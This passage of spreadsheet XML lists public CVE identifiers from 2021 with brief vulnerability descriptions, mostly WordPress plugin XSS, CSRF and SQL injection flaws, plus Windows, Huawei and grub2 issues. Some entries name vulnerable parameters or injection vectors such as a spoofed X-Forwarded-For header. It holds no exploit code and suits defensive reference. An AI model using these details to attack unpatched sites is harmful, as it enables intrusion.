    <t>CVE-2021-36850</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in WordPress Media File Renamer – Auto &amp; Manual Rename plugin (versions &lt;= 5.1.9). Affected parameters "post_title", "filename", "lock". This allows changing the uploaded media title, media file name, and media locking state.</t>
  </si>
  <si>
    <t>CVE-2021-36851</t>
  </si>
  <si>
    <t>Authenticated (editor or higher user role) Cross-Site Scripting (XSS) vulnerability in Web-Settler Testimonial Slider – Free Testimonials Slider Plugin (WordPress plugin) via parameters mpsp_posts_bg_color, mpsp_posts_description_color, mpsp_slide_nav_button_color.</t>
  </si>
  <si>
    <t>CVE-2021-36852</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in ThimPress WP Hotel Booking plugin &lt;= 1.10.5 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36854</t>
  </si>
  <si>
    <t>Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Booking Ultra Pro plugin &lt;= 1.1.4 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36855</t>
  </si>
  <si>
    <t>Cross-Site Scripting (XSS) via Cross-Site Request Forgery (CSRF) vulnerability in Booking Ultra Pro plugin &lt;= 1.1.4 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36857</t>
  </si>
  <si>
    <t>Authenticated (editor+) Stored Cross-Site Scripting (XSS) vulnerability in wpshopmart Testimonial Builder plugin &lt;= 1.6.1 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36858</t>
  </si>
  <si>
    <t>Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Themepoints Testimonials plugin &lt;= 2.6 on WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36861</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in Rich Reviews by Starfish plugin &lt;= 1.9.14 at WordPress allows an attacker to delete reviews.</t>
  </si>
  <si>
    <t>CVE-2021-36863</t>
  </si>
  <si>
    <t>Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in ExpressTech Quiz And Survey Master plugin &lt;= 7.3.4 on WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36864</t>
  </si>
  <si>
    <t>Auth. (editor+) Reflected Cross-Site Scripting (XSS) vulnerability in ExpressTech Quiz And Survey Master plugin &lt;= 7.3.4 on WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36865</t>
  </si>
  <si>
    <t>Insecure direct object references (IDOR) vulnerability in ExpressTech Quiz And Survey Master plugin &lt;= 7.3.4 at WordPress allows attackers to change the content of the quiz.</t>
  </si>
  <si>
    <t>CVE-2021-36866</t>
  </si>
  <si>
    <t>Authenticated (author or higher role) Stored Cross-Site Scripting (XSS) vulnerability in Fatcat Apps Easy Pricing Tables plugin &lt;= 3.1.2 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36867</t>
  </si>
  <si>
    <t>Stored Cross-Site Scripting (XSS) vulnerability in Alexander Ustimenko's Psychological tests &amp; quizzes plugin &lt;= 0.21.19 on WordPress possible for users with contributor or higher user rights.</t>
  </si>
  <si>
    <t>CVE-2021-36869</t>
  </si>
  <si>
    <t>Reflected Cross-Site Scripting (XSS) vulnerability in WordPress Ivory Search plugin (versions &lt;= 4.6.6). Vulnerable parameter: &amp;post.</t>
  </si>
  <si>
    <t>CVE-2021-36870</t>
  </si>
  <si>
    <t>Multiple Authenticated Persistent Cross-Site Scripting (XSS) vulnerabilities in WordPress WP Google Maps plugin (versions &lt;= 8.1.12). Vulnerable parameters: &amp;dataset_name, &amp;wpgmza_gdpr_retention_purpose, &amp;wpgmza_gdpr_company_name, &amp;name #2, &amp;name, &amp;polyname #2, &amp;polyname, &amp;address.</t>
  </si>
  <si>
    <t>CVE-2021-36871</t>
  </si>
  <si>
    <t>Multiple Authenticated Persistent Cross-Site Scripting (XSS) vulnerabilities in WordPress WP Google Maps Pro premium plugin (versions &lt;= 8.1.11). Vulnerable parameters: &amp;wpgmaps_marker_category_name, Value &gt; &amp;attributes[], Name &gt; &amp;attributes[], &amp;icons[], &amp;names[], &amp;description, &amp;link, &amp;title.</t>
  </si>
  <si>
    <t>CVE-2021-36872</t>
  </si>
  <si>
    <t>Authenticated Persistent Cross-Site Scripting (XSS) vulnerability in WordPress Popular Posts plugin (versions &lt;= 5.3.3). Vulnerable at &amp;widget-wpp[2][post_type].</t>
  </si>
  <si>
    <t>CVE-2021-36873</t>
  </si>
  <si>
    <t>Authenticated Persistent Cross-Site Scripting (XSS) vulnerability in WordPress iQ Block Country plugin (versions &lt;= 1.2.11). Vulnerable parameter: &amp;blockcountry_blockmessage.</t>
  </si>
  <si>
    <t>CVE-2021-36874</t>
  </si>
  <si>
    <t>Authenticated Insecure Direct Object References (IDOR) vulnerability in WordPress uListing plugin (versions &lt;= 2.0.5).</t>
  </si>
  <si>
    <t>CVE-2021-36875</t>
  </si>
  <si>
    <t>Authenticated Reflected Cross-Site Scripting (XSS) vulnerability in WordPress uListing plugin (versions &lt;= 2.0.5). Vulnerable parameters: &amp;filter[id], &amp;filter[user], &amp;filter[expired_date], &amp;filter[created_date], &amp;filter[updated_date].</t>
  </si>
  <si>
    <t>CVE-2021-36876</t>
  </si>
  <si>
    <t>Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in WordPress uListing plugin (versions &lt;= 2.0.5) as it lacks CSRF checks on plugin administration pages.</t>
  </si>
  <si>
    <t>CVE-2021-36877</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in WordPress uListing plugin (versions &lt;= 2.0.5) makes it possible for attackers to modify user roles.</t>
  </si>
  <si>
    <t>CVE-2021-36878</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in WordPress uListing plugin (versions &lt;= 2.0.5) makes it possible for attackers to update settings.</t>
  </si>
  <si>
    <t>CVE-2021-36879</t>
  </si>
  <si>
    <t>Unauthenticated Privilege Escalation vulnerability in WordPress uListing plugin (versions &lt;= 2.0.5). Possible if WordPress configuration allows user registration.</t>
  </si>
  <si>
    <t>CVE-2021-3688</t>
  </si>
  <si>
    <t>A flaw was found in Red Hat JBoss Core Services HTTP Server in all versions, where it does not properly normalize the path component of a request URL contains dot-dot-semicolon(s). This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-36880</t>
  </si>
  <si>
    <t>Unauthenticated SQL Injection (SQLi) vulnerability in WordPress uListing plugin (versions &lt;= 2.0.3), vulnerable parameter: custom.</t>
  </si>
  <si>
    <t>CVE-2021-36884</t>
  </si>
  <si>
    <t>Authenticated Persistent Cross-Site Scripting (XSS) vulnerability discovered in WordPress Backup Migration plugin &lt;= 1.1.5 versions.</t>
  </si>
  <si>
    <t>CVE-2021-36885</t>
  </si>
  <si>
    <t>Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability discovered in Contact Form 7 Database Addon – CFDB7 WordPress plugin (versions &lt;= 1.2.6.1).</t>
  </si>
  <si>
    <t>CVE-2021-36886</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability discovered in Contact Form 7 Database Addon – CFDB7 WordPress plugin (versions &lt;= 1.2.5.9).</t>
  </si>
  <si>
    <t>CVE-2021-36887</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability leading to Cross-Site Scripting (XSS) discovered in tarteaucitron.js – Cookies legislation &amp; GDPR WordPress plugin (versions &lt;= 1.5.4), vulnerable parameters "tarteaucitronEmail" and "tarteaucitronPass".</t>
  </si>
  <si>
    <t>CVE-2021-36888</t>
  </si>
  <si>
    <t>Unauthenticated Arbitrary Options Update vulnerability leading to full website compromise discovered in Image Hover Effects Ultimate (versions &lt;= 9.6.1) WordPress plugin.</t>
  </si>
  <si>
    <t>CVE-2021-36889</t>
  </si>
  <si>
    <t>Multiple Stored Authenticated Cross-Site Scripting (XSS) vulnerabilities were discovered in tarteaucitron.js – Cookies legislation &amp; GDPR WordPress plugin (versions &lt;= 1.6).</t>
  </si>
  <si>
    <t>CVE-2021-3689</t>
  </si>
  <si>
    <t>yii2 is vulnerable to Use of Predictable Algorithm in Random Number Generator</t>
  </si>
  <si>
    <t>CVE-2021-36890</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in Social Share Buttons by Supsystic plugin &lt;= 2.2.2 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36891</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in Photo Gallery by Supsystic plugin &lt;= 1.15.5 at WordPress allows changing the plugin settings.</t>
  </si>
  <si>
    <t>CVE-2021-36893</t>
  </si>
  <si>
    <t>Authenticated (author or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in Responsive Tabs (WordPress plugin) &lt;= 4.0.5</t>
  </si>
  <si>
    <t>CVE-2021-36895</t>
  </si>
  <si>
    <t>Unauthenticated Cross-Site Scripting (XSS) vulnerability in Tripetto's Tripetto plugin &lt;= 5.1.4 on WordPress via SVG image upload.</t>
  </si>
  <si>
    <t>CVE-2021-36896</t>
  </si>
  <si>
    <t>Authenticated (author or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in Pricing Table (WordPress plugin) versions &lt;= 1.5.2</t>
  </si>
  <si>
    <t>CVE-2021-36898</t>
  </si>
  <si>
    <t>Auth. SQL Injection (SQLi) vulnerability in Quiz And Survey Master plugin &lt;= 7.3.4 on WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36899</t>
  </si>
  <si>
    <t>Authenticated (admin+) Reflected Cross-Site Scripting (XSS) vulnerability in Gabe Livan's Asset CleanUp: Page Speed Booster plugin &lt;= 1.3.8.4 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-3690</t>
  </si>
  <si>
    <t>A flaw was found in Undertow. A buffer leak on the incoming WebSocket PONG message may lead to memory exhaustion. This flaw allows an attacker to cause a denial of service. The highest threat from this vulnerability is availability.</t>
  </si>
  <si>
    <t>CVE-2021-36901</t>
  </si>
  <si>
    <t>Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in Phil Baker's Age Gate plugin &lt;= 2.17.0 at WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36905</t>
  </si>
  <si>
    <t>Multiple Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerabilities in Quiz And Survey Master plugin &lt;= 7.3.4 on WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36906</t>
  </si>
  <si>
    <t>Multiple Insecure Direct Object References (IDOR) vulnerabilities in ExpressTech Quiz And Survey Master plugin &lt;= 7.3.6 on WordPress.</t>
  </si>
  <si>
    <t>CVE-2021-36908</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability leading to Database Reset in WordPress WP Reset PRO Premium plugin (versions &lt;= 5.98) allows attackers to trick authenticated into making unintentional database reset.</t>
  </si>
  <si>
    <t>CVE-2021-36909</t>
  </si>
  <si>
    <t>Authenticated Database Reset vulnerability in WordPress WP Reset PRO Premium plugin (versions &lt;= 5.98) allows any authenticated user to wipe the entire database regardless of their authorization. It leads to a complete website reset and takeover.</t>
  </si>
  <si>
    <t>CVE-2021-36910</t>
  </si>
  <si>
    <t>Authenticated (admin user role) Stored Cross-Site Scripting (XSS) in WP-Appbox (WordPress plugin) &lt;= 4.3.20.</t>
  </si>
  <si>
    <t>CVE-2021-36911</t>
  </si>
  <si>
    <t>Stored Cross-Site Scripting (XSS) vulnerability discovered in WordPress Comment Engine Pro plugin (versions &lt;= 1.0), could be exploited by users with Editor or higher role.</t>
  </si>
  <si>
    <t>CVE-2021-36912</t>
  </si>
  <si>
    <t>Stored Cross-Site Scripting (XSS) vulnerability in Andrea Pernici News Sitemap for Google plugin &lt;= 1.0.16 on WordPress, attackers must have contributor or higher user role.</t>
  </si>
  <si>
    <t>CVE-2021-36913</t>
  </si>
  <si>
    <t>Unauthenticated Options Change and Content Injection vulnerability in Qube One Redirection for Contact Form 7 plugin &lt;= 2.4.0 at WordPress allows attackers to change options and inject scripts into the footer HTML. Requires an additional extension (plugin) AccessiBe.</t>
  </si>
  <si>
    <t>CVE-2021-36914</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability leading to Reflected Cross-Site Scripting (XSS) in CalderaWP License Manager (WordPress plugin) &lt;= 1.2.11.</t>
  </si>
  <si>
    <t>CVE-2021-36915</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder plugin &lt;= 3.6.0 at WordPress allows uploading the JSON file and updating the options. Requires Import and Export add-on.</t>
  </si>
  <si>
    <t>CVE-2021-36916</t>
  </si>
  <si>
    <t>The SQL injection vulnerability in the Hide My WP WordPress plugin (versions &lt;= 6.2.3) is possible because of how the IP address is retrieved and used inside a SQL query. The function "hmwp_get_user_ip" tries to retrieve the IP address from multiple headers, including IP address headers that the user can spoof, such as "X-Forwarded-For." As a result, the malicious payload supplied in one of these IP address headers will be directly inserted into the SQL query, making SQL injection possible.</t>
  </si>
  <si>
    <t>CVE-2021-36917</t>
  </si>
  <si>
    <t>WordPress Hide My WP plugin (versions &lt;= 6.2.3) can be deactivated by any unauthenticated user. It is possible to retrieve a reset token which can then be used to deactivate the plugin.</t>
  </si>
  <si>
    <t>CVE-2021-36919</t>
  </si>
  <si>
    <t>Multiple Authenticated Reflected Cross-Site Scripting (XSS) vulnerabilities in WordPress Awesome Support plugin (versions &lt;= 6.0.6), vulnerable parameters (&amp;id, &amp;assignee).</t>
  </si>
  <si>
    <t>CVE-2021-3692</t>
  </si>
  <si>
    <t>CVE-2021-36920</t>
  </si>
  <si>
    <t>Authenticated Reflected Cross-Site Scripting (XSS) vulnerability discovered in WordPress plugin Download Monitor (versions &lt;= 4.4.6).</t>
  </si>
  <si>
    <t>CVE-2021-36921</t>
  </si>
  <si>
    <t>AIMANAGER before B115 on MONITORAPP Application Insight Web Application Firewall (AIWAF) devices with Manager 2.1.0 has Improper Authentication. An attacker can gain administrative access by modifying the response to an authentication check request.</t>
  </si>
  <si>
    <t>CVE-2021-36922</t>
  </si>
  <si>
    <t>RtsUpx.sys in Realtek RtsUpx USB Utility Driver for Camera/Hub/Audio through 1.14.0.0 allows local low-privileged users to achieve unauthorized access to USB devices (Escalation of Privileges, Denial of Service, Code Execution, and Information Disclosure) via a crafted Device IO Control packet to a device.</t>
  </si>
  <si>
    <t>CVE-2021-36923</t>
  </si>
  <si>
    <t>RtsUpx.sys in Realtek RtsUpx USB Utility Driver for Camera/Hub/Audio through 1.14.0.0 allows local low-privileged users to achieve unauthorized access to USB device privileged IN and OUT instructions (leading to Escalation of Privileges, Denial of Service, Code Execution, and Information Disclosure) via a crafted Device IO Control packet to a device.</t>
  </si>
  <si>
    <t>CVE-2021-36924</t>
  </si>
  <si>
    <t>RtsUpx.sys in Realtek RtsUpx USB Utility Driver for Camera/Hub/Audio through 1.14.0.0 allows local low-privileged users to achieve a pool overflow (leading to Escalation of Privileges, Denial of Service, and Code Execution) via a crafted Device IO Control packet to a device.</t>
  </si>
  <si>
    <t>CVE-2021-36925</t>
  </si>
  <si>
    <t>RtsUpx.sys in Realtek RtsUpx USB Utility Driver for Camera/Hub/Audio through 1.14.0.0 allows local low-privileged users to achieve an arbitrary read or write operation from/to physical memory (leading to Escalation of Privileges, Denial of Service, Code Execution, and Information Disclosure) via a crafted Device IO Control packet to a device.</t>
  </si>
  <si>
    <t>CVE-2021-36926</t>
  </si>
  <si>
    <t>Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-26433, CVE-2021-36932, CVE-2021-36933.</t>
  </si>
  <si>
    <t>CVE-2021-36927</t>
  </si>
  <si>
    <t>Windows Digital TV Tuner device registration application Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36928</t>
  </si>
  <si>
    <t>Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36931.</t>
  </si>
  <si>
    <t>CVE-2021-36929</t>
  </si>
  <si>
    <t>Microsoft Edge (Chromium-based) Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3693</t>
  </si>
  <si>
    <t>LedgerSMB does not check the origin of HTML fragments merged into the browser's DOM. By sending a specially crafted URL to an authenticated user, this flaw can be abused for remote code execution and information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-36930</t>
  </si>
  <si>
    <t>Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26436.</t>
  </si>
  <si>
    <t>CVE-2021-36931</t>
  </si>
  <si>
    <t>Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36928.</t>
  </si>
  <si>
    <t>CVE-2021-36932</t>
  </si>
  <si>
    <t>Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-26433, CVE-2021-36926, CVE-2021-36933.</t>
  </si>
  <si>
    <t>CVE-2021-36933</t>
  </si>
  <si>
    <t>Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-26433, CVE-2021-36926, CVE-2021-36932.</t>
  </si>
  <si>
    <t>CVE-2021-36934</t>
  </si>
  <si>
    <t>Windows Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36936</t>
  </si>
  <si>
    <t>Windows Print Spooler Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-36947, CVE-2021-36958.</t>
  </si>
  <si>
    <t>CVE-2021-36937</t>
  </si>
  <si>
    <t>Windows Media MPEG-4 Video Decoder Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36938</t>
  </si>
  <si>
    <t>Windows Cryptographic Primitives Library Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3694</t>
  </si>
  <si>
    <t>LedgerSMB does not sufficiently HTML-encode error messages sent to the browser. By sending a specially crafted URL to an authenticated user, this flaw can be abused for remote code execution and information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-36940</t>
  </si>
  <si>
    <t>CVE-2021-36941</t>
  </si>
  <si>
    <t>CVE-2021-36942</t>
  </si>
  <si>
    <t>Windows LSA Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36943</t>
  </si>
  <si>
    <t>Azure CycleCloud Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33762.</t>
  </si>
  <si>
    <t>CVE-2021-36945</t>
  </si>
  <si>
    <t>Windows 10 Update Assistant Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36946</t>
  </si>
  <si>
    <t>Microsoft Dynamics Business Central Cross-site Scripting Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36947</t>
  </si>
  <si>
    <t>Windows Print Spooler Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-36936, CVE-2021-36958.</t>
  </si>
  <si>
    <t>CVE-2021-36948</t>
  </si>
  <si>
    <t>CVE-2021-36949</t>
  </si>
  <si>
    <t>Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3695</t>
  </si>
  <si>
    <t>A crafted 16-bit grayscale PNG image may lead to a out-of-bounds write in the heap area. An attacker may take advantage of that to cause heap data corruption or eventually arbitrary code execution and circumvent secure boot protections. This issue has a high complexity to be exploited as an attacker needs to perform some triage over the heap layout to achieve signifcant results, also the values written into the memory are repeated three times in a row making difficult to produce valid payloads. This flaw affects grub2 versions prior grub-2.12.</t>
  </si>
  <si>
    <t>CVE-2021-36950</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36952</t>
  </si>
  <si>
    <t>CVE-2021-36953</t>
  </si>
  <si>
    <t>Windows TCP/IP Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36954</t>
  </si>
  <si>
    <t>CVE-2021-36955</t>
  </si>
  <si>
    <t>Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36963, CVE-2021-38633.</t>
  </si>
  <si>
    <t>CVE-2021-36956</t>
  </si>
  <si>
    <t>Azure Sphere Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36957</t>
  </si>
  <si>
    <t>CVE-2021-36958</t>
  </si>
  <si>
    <t>Windows Print Spooler Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-36936, CVE-2021-36947.</t>
  </si>
  <si>
    <t>CVE-2021-36959</t>
  </si>
  <si>
    <t>CVE-2021-3696</t>
  </si>
  <si>
    <t>A heap out-of-bounds write may heppen during the handling of Huffman tables in the PNG reader. This may lead to data corruption in the heap space. Confidentiality, Integrity and Availablity impact may be considered Low as it's very complex to an attacker control the encoding and positioning of corrupted Huffman entries to achieve results such as arbitrary code execution and/or secure boot circumvention. This flaw affects grub2 versions prior grub-2.12.</t>
  </si>
  <si>
    <t>CVE-2021-36960</t>
  </si>
  <si>
    <t>Windows SMB Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-36972.</t>
  </si>
  <si>
    <t>CVE-2021-36961</t>
  </si>
  <si>
    <t>Windows Installer Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36962</t>
  </si>
  <si>
    <t>Windows Installer Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36963</t>
  </si>
  <si>
    <t>Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36955, CVE-2021-38633.</t>
  </si>
  <si>
    <t>CVE-2021-36964</t>
  </si>
  <si>
    <t>Windows Event Tracing Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38630.</t>
  </si>
  <si>
    <t>CVE-2021-36965</t>
  </si>
  <si>
    <t>Windows WLAN AutoConfig Service Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36966</t>
  </si>
  <si>
    <t>Windows Subsystem for Linux Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36967</t>
  </si>
  <si>
    <t>Windows WLAN AutoConfig Service Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36968</t>
  </si>
  <si>
    <t>Windows DNS Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36969</t>
  </si>
  <si>
    <t>Windows Redirected Drive Buffering SubSystem Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-38635, CVE-2021-38636.</t>
  </si>
  <si>
    <t>CVE-2021-3697</t>
  </si>
  <si>
    <t>A crafted JPEG image may lead the JPEG reader to underflow its data pointer, allowing user-controlled data to be written in heap. To a successful to be performed the attacker needs to perform some triage over the heap layout and craft an image with a malicious format and payload. This vulnerability can lead to data corruption and eventual code execution or secure boot circumvention. This flaw affects grub2 versions prior grub-2.12.</t>
  </si>
  <si>
    <t>CVE-2021-36970</t>
  </si>
  <si>
    <t>Windows Print Spooler Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36972</t>
  </si>
  <si>
    <t>Windows SMB Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-36960.</t>
  </si>
  <si>
    <t>CVE-2021-36973</t>
  </si>
  <si>
    <t>Windows Redirected Drive Buffering System Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36974</t>
  </si>
  <si>
    <t>Windows SMB Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-36975</t>
  </si>
  <si>
    <t>Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38639.</t>
  </si>
  <si>
    <t>CVE-2021-36976</t>
  </si>
  <si>
    <t>libarchive 3.4.1 through 3.5.1 has a use-after-free in copy_string (called from do_uncompress_block and process_block).</t>
  </si>
  <si>
    <t>CVE-2021-36977</t>
  </si>
  <si>
    <t>matio (aka MAT File I/O Library) 1.5.20 and 1.5.21 has a heap-based buffer overflow in H5MM_memcpy (called from H5MM_malloc and H5C_load_entry), related to use of HDF5 1.12.0.</t>
  </si>
  <si>
    <t>CVE-2021-36978</t>
  </si>
  <si>
    <t>QPDF 9.x through 9.1.1 and 10.x through 10.0.4 has a heap-based buffer overflow in Pl_ASCII85Decoder::write (called from Pl_AES_PDF::flush and Pl_AES_PDF::finish) when a certain downstream write fails.</t>
  </si>
  <si>
    <t>CVE-2021-36979</t>
  </si>
  <si>
    <t>Unicorn Engine 1.0.2 has an out-of-bounds write in tb_flush_armeb (called from cpu_arm_exec_armeb and tcg_cpu_exec_armeb).</t>
  </si>
  <si>
    <t>CVE-2021-3698</t>
  </si>
  <si>
    <t>A flaw was found in Cockpit in versions prior to 260 in the way it handles the certificate verification performed by the System Security Services Daemon (SSSD). This flaw allows client certificates to authenticate successfully, regardless of the Certificate Revocation List (CRL) configuration or the certificate status. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-36980</t>
  </si>
  <si>
    <t>Open vSwitch (aka openvswitch) 2.11.0 through 2.15.0 has a use-after-free in decode_NXAST_RAW_ENCAP (called from ofpact_decode and ofpacts_decode) during the decoding of a RAW_ENCAP action.</t>
  </si>
  <si>
    <t>CVE-2021-36981</t>
  </si>
  <si>
    <t>In the server in SerNet verinice before 1.22.2, insecure Java deserialization allows remote authenticated attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-36982</t>
  </si>
  <si>
    <t>AIMANAGER before B115 on MONITORAPP Application Insight Web Application Firewall (AIWAF) devices with Manager 2.1.0 allows OS Command Injection because of missing input validation on one of the parameters of an HTTP request.</t>
  </si>
  <si>
    <t>CVE-2021-36983</t>
  </si>
  <si>
    <t>replay-sorcery-kms in Replay Sorcery 0.6.0 allows a local attacker to gain root privileges via a symlink attack on /tmp/replay-sorcery or /tmp/replay-sorcery/device.sock.</t>
  </si>
  <si>
    <t>CVE-2021-36985</t>
  </si>
  <si>
    <t>There is a Code injection vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may exhaust system resources and cause the system to restart.</t>
  </si>
  <si>
    <t>CVE-2021-36986</t>
  </si>
  <si>
    <t>There is a vulnerability of tampering with the kernel in Huawei Smartphone.Successful exploitation of this vulnerability may escalate permissions.</t>
  </si>
  <si>
    <t>CVE-2021-36987</t>
  </si>
  <si>
    <t>There is a issue that nodes in the linked list being freed for multiple times in Huawei Smartphone due to race conditions. Successful exploitation of this vulnerability can cause the system to restart.</t>
  </si>
  <si>
    <t>CVE-2021-36988</t>
  </si>
  <si>
    <t>There is a Parameter verification issue in Huawei Smartphone.Successful exploitation of this vulnerability can affect service integrity.</t>
  </si>
  <si>
    <t>CVE-2021-36989</t>
  </si>
  <si>
    <t>There is a Kernel crash vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may escalate permissions.</t>
  </si>
  <si>
    <t>CVE-2021-36990</t>
  </si>
  <si>
    <t>CVE-2021-36991</t>
  </si>
  <si>
    <t>There is an Unauthorized file access vulnerability in Huawei Smartphone due to unstandardized path input.Successful exploitation of this vulnerability by creating malicious file paths can cause unauthorized file access.</t>
  </si>
  <si>
    <t>CVE-2021-36992</t>
  </si>
  <si>
    <t>There is a Public key verification vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-36993</t>
  </si>
  <si>
    <t>There is a Memory leaks vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may affect service availability.</t>
  </si>
  <si>
    <t>CVE-2021-36994</t>
  </si>
  <si>
    <t>There is a issue that trustlist strings being repeatedly inserted into the linked list in Huawei Smartphone due to race conditions. Successful exploitation of this vulnerability can cause exceptions when managing the system trustlist.</t>
  </si>
  <si>
    <t>CVE-2021-36995</t>
  </si>
  <si>
    <t>There is an Unauthorized file access vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability by modifying soft links may tamper with the files restored from backups.</t>
  </si>
  <si>
    <t>CVE-2021-36996</t>
  </si>
  <si>
    <t>There is an Improper verification vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause transmission of certain virtual information.</t>
  </si>
  <si>
    <t>CVE-2021-36997</t>
  </si>
  <si>
    <t>There is a Low memory error in Huawei Smartphone due to the unlimited size of images to be parsed.Successful exploitation of this vulnerability may cause the Gallery or Files app to exit unexpectedly.</t>
  </si>
  <si>
    <t>CVE-2021-36998</t>
  </si>
  <si>
    <t>There is an Improper verification vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may allow attempts to read an array that is out of bounds.</t>
  </si>
  <si>
    <t>CVE-2021-36999</t>
  </si>
  <si>
    <t>There is a Buffer overflow vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability by sending malicious images and inducing users to open the images may cause remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-3700</t>
  </si>
  <si>
    <t>A use-after-free vulnerability was found in usbredir in versions prior to 0.11.0 in the usbredirparser_serialize() in usbredirparser/usbredirparser.c. This issue occurs when serializing large amounts of buffered write data in the case of a slow or blocked destination.</t>
  </si>
  <si>
    <t>CVE-2021-37001</t>
  </si>
  <si>
    <t>There is a Register tampering vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may allow the register value to be modified.</t>
  </si>
  <si>
    <t>CVE-2021-37002</t>
  </si>
  <si>
    <t>There is a Memory out-of-bounds access vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause malicious code to be executed.</t>
  </si>
  <si>
    <t>CVE-2021-37003</t>
  </si>
  <si>
